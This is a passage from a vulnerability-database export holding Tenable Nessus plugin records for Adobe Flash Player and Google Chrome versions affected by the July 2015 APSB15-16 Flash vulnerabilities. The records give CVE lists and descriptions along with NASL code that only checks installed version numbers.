CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)", "edition": 30, "published": "2015-07-09T00:00:00", "title": "Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84642", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84642);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 18.0.0.194. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 18.0.0.203 or later.\n\nAlternatively, Adobe has made version 13.0.0.302 available for those\ninstallations that cannot be upgraded to 18.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 18.0.0.194\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.194\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 13.0.0.296\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"13.0.0.296\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 14-18 <= 18.0.0.194\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^1[4-8]\\.\" &&\n ver_compare(ver:ver,fix:\"18.0.0.194\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : NPAPI Browser plugin (for Firefox / Netscape / Opera)';\n fix = \"18.0.0.203 / 13.0.0.302\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"18.0.0.203 / 13.0.0.302\";\n }\n else if (variant == \"Chrome\")\n {\n info += '\\n Product : Browser plugin (for Google Chrome)';\n fix = \"Upgrade to the latest version of Google Chrome.\";\n }\n else if (variant == \"Chrome_Pepper\")\n {\n info += '\\n Product : PPAPI Browser plugin (for Opera and Chromium)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 18.0.0.203 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-01T01:18:25", "description": "The version of Google Chrome installed on the remote Mac OS X host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 31, "published": "2015-07-10T00:00:00", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/nessus/84668", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84668);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-01T00:48:31", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 31, "published": "2015-07-10T00:00:00", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/nessus/84667", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84667);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-01T01:17:40", "description": "The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 18.0.0.194. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)", "edition": 30, "published": "2015-07-09T00:00:00", "title": "Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16) (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", 